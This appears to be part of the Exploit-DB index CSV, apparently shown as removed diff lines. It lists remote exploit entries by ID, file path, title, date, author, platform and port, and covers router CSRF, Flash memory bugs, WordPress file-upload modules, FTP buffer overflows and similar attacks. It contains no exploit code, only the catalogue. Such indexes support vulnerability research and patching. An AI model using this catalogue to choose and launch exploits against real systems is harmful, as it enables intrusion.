-36680,exploits/hardware/remote/36680.txt,"Trendnet Camera (Multiple Products) - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote, -36681,exploits/multiple/remote/36681.txt,"Apache MyFaces - 'ln' Information Disclosure",2012-02-09,"Paul Nicolucci",multiple,remote, -36690,exploits/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Authenticated Remote Command Execution (Metasploit)",2015-04-09,xort,linux,remote,8000 -36742,exploits/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote, -36744,exploits/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow (Metasploit)",2015-04-13,Metasploit,windows,remote, -36756,exploits/windows/remote/36756.html,"Samsung iPOLiS - ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote, -36767,exploits/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 - Cross-Site Request Forgery",2012-02-13,MustLive,hardware,remote, -36803,exploits/linux/remote/36803.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution",2015-04-21,R-73eN,linux,remote, -36808,exploits/windows/remote/36808.rb,"Adobe Flash Player - copyPixelsToByteArray Integer Overflow (Metasploit)",2015-04-21,Metasploit,windows,remote, -36809,exploits/php/remote/36809.rb,"WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80 -36810,exploits/php/remote/36810.rb,"WordPress Plugin N-Media Website Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80 -36811,exploits/php/remote/36811.rb,"WordPress Plugin Creative Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80 -36812,exploits/php/remote/36812.rb,"WordPress Plugin Work The Flow - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80 -36829,exploits/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Based Buffer Overflow / Directory Traversal",2012-02-17,"Luigi Auriemma",windows,remote, -36831,exploits/hardware/remote/36831.txt,"Endian Firewall 2.4 - 'openvpn_users.cgi?PATH_INFO' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote, -36832,exploits/hardware/remote/36832.txt,"Endian Firewall 2.4 - 'dnat.cgi?createrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote, -36833,exploits/hardware/remote/36833.txt,"Endian Firewall 2.4 - 'dansguardian.cgi?addrule' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",hardware,remote, -36836,exploits/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution (PoC)",2015-04-27,"Jay Turla",multiple,remote, -36839,exploits/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",multiple,remote, -36995,exploits/hardware/remote/36995.txt,"F5 FirePass 7.0 - SQL Injection",2012-03-14,anonymous,hardware,remote, -37169,exploits/linux/remote/37169.rb,"Realtek SDK - Miniigd UPnP SOAP Command Execution (Metasploit)",2015-06-01,Metasploit,linux,remote,52869 -36864,exploits/hardware/remote/36864.txt,"Xavi 7968 ADSL Router - Multiple Cross-Site Request Forgery Vulnerabilities",2012-02-21,Busindre,hardware,remote, -36866,exploits/hardware/remote/36866.txt,"Xavi 7968 ADSL Router - '/webconfig/wan/confirm.html/confirm?pvcName' Cross-Site Scripting",2012-02-21,Busindre,hardware,remote, -36877,exploits/hardware/remote/36877.html,"D-Link DCS - 'security.cgi' Cross-Site Request Forgery",2012-02-23,"Rigan Iimrigan",hardware,remote, -36880,exploits/windows/remote/36880.rb,"Adobe Flash Player - UncompressViaZlibVariant Uninitialized Memory (Metasploit)",2015-05-01,Metasploit,windows,remote, -36884,exploits/linux/remote/36884.py,"libpurple 2.8.10 - OTR Information Disclosure",2012-02-25,"Dimitris Glynos",linux,remote, -36915,exploits/windows/remote/36915.txt,"NetDecision 4.6.1 - Multiple Directory Traversal Vulnerabilities",2012-03-07,"Luigi Auriemma",windows,remote, -36931,exploits/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 - Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote, -36932,exploits/windows/remote/36932.py,"RealVNC 4.1.0/4.1.1 - Authentication Bypass",2012-05-13,fdiskyou,windows,remote,5900 -36933,exploits/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection (PoC) (Shellshock)",2014-09-29,fdiskyou,linux,remote, -36945,exploits/hardware/remote/36945.txt,"TP-Link TL-WR740N 111130 - 'ping_addr' HTML Injection",2012-03-12,l20ot,hardware,remote, -36955,exploits/osx/remote/36955.py,"MacKeeper - URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote, -36956,exploits/windows/remote/36956.rb,"Adobe Flash Player - domainMemory ByteArray Use-After-Free (Metasploit)",2015-05-08,Metasploit,windows,remote, -36957,exploits/php/remote/36957.rb,"WordPress Plugin RevSlider 3.0.95 - Arbitrary File Upload / Execution (Metasploit)",2015-05-08,Metasploit,php,remote,80 -36962,exploits/windows/remote/36962.rb,"Adobe Flash Player - NetConnection Type Confusion (Metasploit)",2015-05-08,Metasploit,windows,remote, -36964,exploits/java/remote/36964.rb,"Novell ZENworks Configuration Management - Arbitrary File Upload (Metasploit)",2015-05-08,Metasploit,java,remote,443 -36984,exploits/windows/remote/36984.py,"i.FTP 2.21 - Time Field (SEH)",2015-05-11,"Revin Hadi Saputra",windows,remote, -36996,exploits/unix/remote/36996.rb,"SixApart MovableType - Storable Perl Code Execution (Metasploit)",2015-05-12,Metasploit,unix,remote,80 -37007,exploits/linux/remote/37007.txt,"AtMail 1.04 - Multiple Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote, -37020,exploits/windows/remote/37020.html,"Apple Safari 5.1.5 For Windows - 'window.open()' URI Spoofing",2012-03-28,Lostmon,windows,remote, -37037,exploits/hardware/remote/37037.txt,"Arbor Networks Peakflow SP 3.6.1 - 'index/' Cross-Site Scripting",2012-04-03,b.saleh,hardware,remote, -37066,exploits/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC - Remote Control Script",2015-05-20,Photubias,hardware,remote, -37081,exploits/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass",2012-04-16,"Gabriel Menezes Nunes",multiple,remote, -37097,exploits/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass / Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote, -37141,exploits/hardware/remote/37141.txt,"Linksys WRT54GL Wireless Router - Cross-Site Request Forgery",2012-05-08,Kalashinkov3,hardware,remote, -37170,exploits/hardware/remote/37170.rb,"Airties - login-cgi Buffer Overflow (Metasploit)",2015-06-01,Metasploit,hardware,remote, -37163,exploits/windows/remote/37163.py,"IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote, -37165,exploits/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Remote Buffer Overflow (PoC)",2015-06-01,metacom,windows,remote, -37171,exploits/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution (Metasploit)",2015-06-01,Metasploit,hardware,remote, -37184,exploits/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",hardware,remote, -37198,exploits/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote, -37262,exploits/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote, -37336,exploits/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote, -37368,exploits/multiple/remote/37368.rb,"Adobe Flash Player - ShaderJob Buffer Overflow (Metasploit)",2015-06-24,Metasploit,multiple,remote, -37396,exploits/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injections",2012-06-13,Sangteamtham,windows,remote, -37400,exploits/windows/remote/37400.php,"Havij - OLE Automation Array Remote Code Execution",2015-06-27,"Mohammad Reza Espargham",windows,remote, -37429,exploits/hardware/remote/37429.txt,"Juniper Networks Mobility System Software - '/aaa/wba_login.html' Cross-Site Scripting",2012-06-14,"Craig Lambert",hardware,remote, -37405,exploits/hardware/remote/37405.py,"Edimax IC-3030iWn - UDP Packet Password Information Disclosure",2012-06-14,y3dips,hardware,remote, -37426,exploits/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python) (PoC)",2015-06-29,"Ben Lincoln",cgi,remote, -37428,exploits/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)",2015-06-29,"Ben Lincoln",cgi,remote, -37564,exploits/hardware/remote/37564.txt,"Barracuda Email Security Service - Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",hardware,remote, -37448,exploits/multiple/remote/37448.rb,"Adobe Flash Player - Drawing Fill Shader Memory Corruption (Metasploit)",2015-06-30,Metasploit,multiple,remote, -37510,exploits/windows/remote/37510.c,"Google Chrome 19.0.1084.52 - 'metro_driver.dll' DLL Loading Arbitrary Code Execution",2012-06-26,"Moshe Zioni",windows,remote, -37512,exploits/hardware/remote/37512.txt,"Barracuda SSL VPN - 'launchAgent.do?return-To' Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote, -37513,exploits/hardware/remote/37513.txt,"Barracuda SSL VPN - 'fileSystem.do' Multiple Cross-Site Scripting Vulnerabilities",2012-07-18,"Benjamin Kunz Mejri",hardware,remote, -37523,exploits/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free (Metasploit)",2015-07-08,Metasploit,multiple,remote, -37536,exploits/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,multiple,remote, -37542,exploits/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote, -37576,exploits/linux/remote/37576.cpp,"Alligra Calligra - Heap Based Buffer Overflow",2012-08-07,"Charlie Miller",linux,remote, -37597,exploits/hardware/remote/37597.rb,"Accellion FTA - getStatus verify_oauth_token Command Execution (Metasploit)",2015-07-13,Metasploit,hardware,remote,443 -37598,exploits/multiple/remote/37598.rb,"VNC Keyboard - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,multiple,remote,5900 -37599,exploits/windows/remote/37599.rb,"Adobe Flash - opaqueBackground Use-After-Free (Metasploit)",2015-07-13,Metasploit,windows,remote, -37600,exploits/multiple/remote/37600.rb,"Western Digital Arkeia < 11.0.12 - Remote Code Execution (Metasploit)",2015-07-13,Metasploit,multiple,remote,617 -37611,exploits/windows/remote/37611.php,"Impero Education Pro - System Remote Command Execution",2015-07-14,slipstream,windows,remote, -37628,exploits/hardware/remote/37628.rb,"D-Link Devices - Cookie Command Execution (Metasploit)",2015-07-17,Metasploit,hardware,remote, -37647,exploits/multiple/remote/37647.txt,"Apache Struts 2 - Skill Name Remote Code Execution",2012-08-23,kxlzx,multiple,remote, -37655,exploits/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote, -37688,exploits/php/remote/37688.txt,"PHP 5.3.11/5.4.0RC2 - 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",php,remote, -37667,exploits/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' - Arbitrary File Upload (Metasploit)",2015-07-21,Metasploit,java,remote, -37668,exploits/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote, -37671,exploits/multiple/remote/37671.txt,"Websense Content Gateway - Multiple Cross-Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote, -37729,exploits/windows/remote/37729.py,"FileZilla Client 2.2.x - Remote Buffer Overflow (SEH)",2015-08-07,ly0n,windows,remote, -37731,exploits/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - 'PUT' Remote Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21 -37746,exploits/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote, -37947,exploits/multiple/remote/37947.txt,"Litespeed Web Server - 'gtitle' Cross-Site Scripting",2012-03-12,K1P0D,multiple,remote, -37949,exploits/linux/remote/37949.txt,"ModSecurity - 'POST' Security Bypass",2012-10-17,"Bernhard Mueller",linux,remote, -37951,exploits/windows/remote/37951.py,"Easy File Sharing Web Server 6.9 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote, -37788,exploits/linux/remote/37788.py,"libguac - Remote Buffer Overflow",2012-09-11,"Michael Jumper",linux,remote, -37792,exploits/android/remote/37792.txt,"Google Chrome for Android - com.android.browser.application_id Intent Extra Data Cross-Site Scripting",2012-09-12,"Artem Chaykin",android,remote, -37793,exploits/android/remote/37793.txt,"Google Chrome for Android - Multiple 'file::' URL Handler Local Downloaded Content Disclosure Vulnerabilities",2012-09-12,"Artem Chaykin",android,remote, -37794,exploits/android/remote/37794.txt,"Google Chrome for Android - Local Application Handling Cookie Theft",2012-09-12,"Artem Chaykin",android,remote, -37795,exploits/android/remote/37795.txt,"Google Chrome for Android - Same-origin Policy Bypass Local Symlink",2012-09-12,"Artem Chaykin",android,remote, -37800,exploits/windows/remote/37800.php,"Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)",2015-08-17,"Mohammad Reza Espargham",windows,remote, -37803,exploits/hardware/remote/37803.txt,"CoSoSys Endpoint Protector - Predictable Password Generation",2012-09-17,"Christopher Campbell",hardware,remote, -37808,exploits/windows/remote/37808.py,"Easy File Management Web Server 5.6 - 'USERID' Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote, -37812,exploits/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution (Metasploit)",2015-08-18,Metasploit,win_x86,remote,8443 -37814,exploits/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution (Metasploit)",2015-08-18,Metasploit,python,remote, -37834,exploits/linux/remote/37834.py,"Samba 3.5.11/3.6.3 - Remote Code Execution",2012-09-24,kb,linux,remote, -37840,exploits/windows/remote/37840.txt,"Flash Broker-Based - Sandbox Escape via Forward Slash Instead of Backslash",2015-08-19,KeenTeam,windows,remote, -37841,exploits/windows/remote/37841.txt,"Flash Broker-Based - Sandbox Escape via Unexpected Directory Lock",2015-08-19,KeenTeam,windows,remote, -37842,exploits/windows/remote/37842.txt,"Flash Broker-Based - Sandbox Escape via Timing Attack Against File Moving",2015-08-19,KeenTeam,windows,remote, -37851,exploits/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",multiple,remote, -37889,exploits/linux/remote/37889.txt,"YingZhiPython - Directory Traversal / Arbitrary File Upload",2012-09-26,"Larry Cashdollar",linux,remote, -37900,exploits/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x - Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote, -37952,exploits/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote, -37958,exploits/multiple/remote/37958.rb,"Mozilla Firefox - 'pdf.js' Privileged JavaScript Injection (Metasploit)",2015-08-24,Metasploit,multiple,remote, -37969,exploits/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection",2012-10-21,"Aung Khant",hardware,remote, -37985,exploits/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80 -37996,exploits/windows/remote/37996.txt,"Axigen Mail Server - 'Filename' Directory Traversal",2012-10-31,"Zhao Liang",windows,remote, -38003,exploits/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - 'GET' Remote Buffer Overflow",2015-08-29,Koby,windows,remote,21 -38005,exploits/windows/remote/38005.asp,"MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer",2015-08-29,ylbhz,windows,remote, -38013,exploits/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow",2015-08-29,Koby,windows,remote,21 -38020,exploits/hardware/remote/38020.py,"Huawei (Multiple Products) - Password Encryption",2012-11-13,"Roberto Paleari",hardware,remote, -38049,exploits/multiple/remote/38049.txt,"Greenstone - Multiple Vulnerabilities",2012-11-23,AkaStep,multiple,remote, -38058,exploits/ios/remote/38058.py,"Twitter for iPhone - Man in the Middle Security",2012-11-23,"Carlos Reventlov",ios,remote, -38100,exploits/hardware/remote/38100.txt,"Fortinet FortiWeb (Multiple Appliances) - Multiple Cross-Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote, -38096,exploits/linux/remote/38096.rb,"Endian Firewall - Password Change Command Injection (Metasploit)",2015-09-07,Metasploit,linux,remote,10443 -38109,exploits/linux/remote/38109.pl,"Oracle MySQL / MariaDB - Insecure Salt Generation Security Bypass",2012-12-06,kingcope,linux,remote, -38124,exploits/android/remote/38124.py,"Google Android - 'Stagefright' Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote, -38203,exploits/linux/remote/38203.txt,"Schmid Watson Management Console - Directory Traversal",2013-01-09,"Dhruv Shah",linux,remote, -38151,exploits/windows/remote/38151.py,"Microsoft Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote, -38164,exploits/hardware/remote/38164.py,"Belkin Wireless Router - Default WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote, -38170,exploits/android/remote/38170.txt,"Facebook for Android - 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote, -38179,exploits/multiple/remote/38179.txt,"Dell OpenManage Server Administrator - Cross-Site Scripting",2013-01-09,"Tenable NS",multiple,remote, -38186,exploits/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote, -38195,exploits/windows/remote/38195.rb,"Microsoft Windows Media Center - MCL (MS15-100) (Metasploit)",2015-09-15,Metasploit,windows,remote, -38196,exploits/php/remote/38196.rb,"CMS Bolt - Arbitrary File Upload (Metasploit)",2015-09-15,Metasploit,php,remote,80 -38206,exploits/windows/remote/38206.html,"Samsung Kies - Remote Buffer Overflow",2013-01-09,"High-Tech Bridge",windows,remote, -38221,exploits/java/remote/38221.rb,"ManageEngine OpManager - Remote Code Execution (Metasploit)",2015-09-17,Metasploit,java,remote, -38226,exploits/android/remote/38226.py,"Google Android - libstagefright Integer Overflow Remote Code Execution",2015-09-17,"Google Security Research",android,remote, -38227,exploits/windows/remote/38227.txt,"Microsoft Lync 2010 4.0.7577.0 - User-Agent Header Handling Arbitrary Command Execution",2013-01-11,"Christopher Emerson",windows,remote, -38230,exploits/multiple/remote/38230.txt,"Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities",2013-01-18,"Juan Caillava",multiple,remote, -38233,exploits/hardware/remote/38233.txt,"F5 Networks BIG-IP - XML External Entity Injection",2013-01-21,anonymous,hardware,remote, -38242,exploits/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",hardware,remote, -38248,exploits/multiple/remote/38248.txt,"Multiple Hunt CCTV - Information Disclosure",2013-01-29,"Alejandro Ramos",multiple,remote, -38250,exploits/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote, -38252,exploits/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21 -38254,exploits/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Authenticated CWD Command Overflow (SEH) (Metasploit)",2015-09-21,Metasploit,windows,remote,21 -38260,exploits/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,windows,remote,21 -38302,exploits/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution (Metasploit)",2015-09-23,Metasploit,multiple,remote,6667 -38308,exploits/hardware/remote/38308.txt,"TP-Link TL-WR2543ND Router - Admin Panel Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote, -38310,exploits/android/remote/38310.c,"Google Android 2.3.5 - PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",android,remote, -38313,exploits/multiple/remote/38313.html,"Dell SonicWALL Scrutinizer - Multiple HTML Injection Vulnerabilities",2013-02-14,"Benjamin Kunz Mejri",multiple,remote, -38325,exploits/windows/remote/38325.txt,"Alt-N MDaemon WorldClient And WebAdmin - Cross-Site Request Forgery",2013-02-18,QSecure,windows,remote, -38330,exploits/windows/remote/38330.txt,"Photodex ProShow Producer - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-02-23,"Julien Ahrens",windows,remote, -38340,exploits/windows/remote/38340.py,"PCMan FTP Server 2.0.7 - Directory Traversal",2015-09-28,"Jay Turla",windows,remote,21 -38341,exploits/windows/remote/38341.py,"BisonWare BisonFTP Server 3.5 - Directory Traversal",2015-09-28,"Jay Turla",windows,remote,21 -38346,exploits/bsd/remote/38346.rb,"Watchguard XCS - Remote Command Execution (Metasploit)",2015-09-28,Metasploit,bsd,remote,443 -38352,exploits/windows/remote/38352.rb,"ManageEngine EventLog Analyzer - Remote Code Execution (Metasploit)",2015-09-29,Metasploit,windows,remote,8400 -38356,exploits/hardware/remote/38356.txt,"Foscam < 11.37.2.49 - Directory Traversal",2013-03-01,"Frederic Basse",hardware,remote, -38402,exploits/multiple/remote/38402.rb,"Zemra Botnet (C2 Web Panel) - Remote Code Execution (Metasploit)",2015-10-05,Metasploit,multiple,remote, -38401,exploits/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - 'uploader.aspx' Arbitrary File Upload (Metasploit)",2015-10-05,Metasploit,windows,remote, -38368,exploits/multiple/remote/38368.txt,"McAfee Vulnerability Manager - 'cert_cn' Cross-Site Scripting",2013-03-08,"Asheesh Anaconda",multiple,remote, -38370,exploits/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote, -38384,exploits/windows/remote/38384.txt,"Avast! AntiVirus - X.509 Error Rendering Command Execution",2015-10-02,"Google Security Research",windows,remote, -38387,exploits/multiple/remote/38387.txt,"RubyGems fastreader - 'entry_controller.rb' Remote Command Execution",2013-03-12,"Larry W. Cashdollar",multiple,remote, -38388,exploits/windows/remote/38388.txt,"QlikView - '.qvw' File Remote Integer Overflow",2013-03-13,"A. Antukh",windows,remote, -38389,exploits/hardware/remote/38389.txt,"Cisco Video Surveillance Operations Manager - Multiple Vulnerabilities",2013-03-13,b.saleh,hardware,remote, -38394,exploits/windows/remote/38394.py,"BlazeVideo HDTV Player Standard - '.plf' File Remote Buffer Overflow",2013-03-19,metacom,windows,remote, -38536,exploits/hardware/remote/38536.txt,"Barracuda SSL VPN 680 - 'returnTo' Open Redirection",2013-05-27,"Chokri Ben Achor",hardware,remote, -38412,exploits/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote, -38437,exploits/hardware/remote/38437.txt,"Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,hardware,remote, -38454,exploits/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution",2015-10-14,blasty,multiple,remote, -38453,exploits/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",hardware,remote, -38464,exploits/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router - Multiple Vulnerabilities",2013-04-15,"Phil Purviance",hardware,remote, -38481,exploits/hardware/remote/38481.html,"D-Link DIR-865L - Cross-Site Request Forgery",2013-04-19,"Jacob Holcomb",hardware,remote, -38489,exploits/php/remote/38489.rb,"Nibbleblog - Arbitrary File Upload (Metasploit)",2015-10-19,Metasploit,php,remote, -38492,exploits/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",hardware,remote, -38495,exploits/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",hardware,remote, -38500,exploits/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",windows,remote, -38501,exploits/hardware/remote/38501.txt,"Cisco Linksys E4200 - '/apply.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-04-27,"Carl Benedict",hardware,remote, -38505,exploits/php/remote/38505.rb,"Zpanel - Unauthenticated Remote Code Execution (Metasploit)",2015-10-21,Metasploit,php,remote, -38512,exploits/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote, -38513,exploits/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - Remote File Inclusion / Remote Code Execution",2015-10-22,Scurippio,windows,remote, -38521,exploits/multiple/remote/38521.c,"Python RRDtool Module - Function Format String",2013-05-18,"Thomas Pollet",multiple,remote, -38522,exploits/linux/remote/38522.txt,"Acme thttpd HTTP Server - Directory Traversal",2013-05-19,Metropolis,linux,remote, -38526,exploits/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote Overflow (SEH)",2015-10-23,Audit0r,windows,remote, -38535,exploits/osx/remote/38535.rb,"Apple Safari - User-Assisted Applescript Exec Attack (Metasploit)",2015-10-26,Metasploit,osx,remote, -38644,exploits/windows/remote/38644.txt,"SolarWinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote, -38541,exploits/php/remote/38541.rb,"Th3 MMA - 'mma.php' Backdoor Arbitrary File Upload (Metasploit)",2015-10-27,Metasploit,php,remote,80 -38549,exploits/multiple/remote/38549.txt,"Apache Struts - OGNL Expression Injection",2013-06-05,"Jon Passki",multiple,remote, -38554,exploits/android/remote/38554.py,"Samsung SecEmailUI - Script Injection",2015-10-28,"Google Security Research",android,remote, -38582,exploits/hardware/remote/38582.html,"Brickcom Multiple IP Cameras - Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote, -38583,exploits/hardware/remote/38583.html,"Sony CH / DH Series IP Cameras - Multiple Cross-Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote, -38584,exploits/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras - Cross-Site Request Forgery",2013-06-12,Castillo,hardware,remote, -38586,exploits/android/remote/38586.txt,"TaxiMonger for Android - 'name' HTML Injection",2013-06-15,"Ismail Kaleem",android,remote, -38587,exploits/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin - Security Bypass",2013-06-14,felipensp,multiple,remote, -38591,exploits/hardware/remote/38591.py,"TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass",2013-06-19,SANTHO,hardware,remote, -38597,exploits/multiple/remote/38597.txt,"Motion - Multiple Vulnerabilities",2013-06-26,xistence,multiple,remote, -38599,exploits/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 (Windows x86) - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win_x86,remote, -38632,exploits/hardware/remote/38632.txt,"Zoom Telephonics (Multiple Devices) - Multiple Vulnerabilities",2013-07-09,"Kyle Lovett",hardware,remote, -38627,exploits/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote, -38633,exploits/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote, -38634,exploits/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote, -38636,exploits/multiple/remote/38636.txt,"Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure",2012-11-07,"Mario Heiderich",multiple,remote, -38637,exploits/multiple/remote/38637.txt,"Cryptocat 2.0.22 - Arbitrary Script Injection",2012-11-07,"Mario Heiderich",multiple,remote, -38660,exploits/php/remote/38660.rb,"WordPress Plugin Ajax Load More 2.8.1.1 - PHP Upload (Metasploit)",2015-11-09,Metasploit,php,remote, -38663,exploits/hardware/remote/38663.txt,"Huawei HG630a / HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote, -38666,exploits/multiple/remote/38666.txt,"Apache Struts 2.2.3 - Multiple Open Redirections",2013-07-16,"Takeshi Terada",multiple,remote, -38667,exploits/windows/remote/38667.py,"ReadyMedia - Remote Heap Buffer Overflow",2013-07-15,"Zachary Cutlip",windows,remote, -38669,exploits/multiple/remote/38669.txt,"MongoDB - 'conn' Mongo Object Remote Code Execution",2013-06-04,"SCRT Security",multiple,remote, 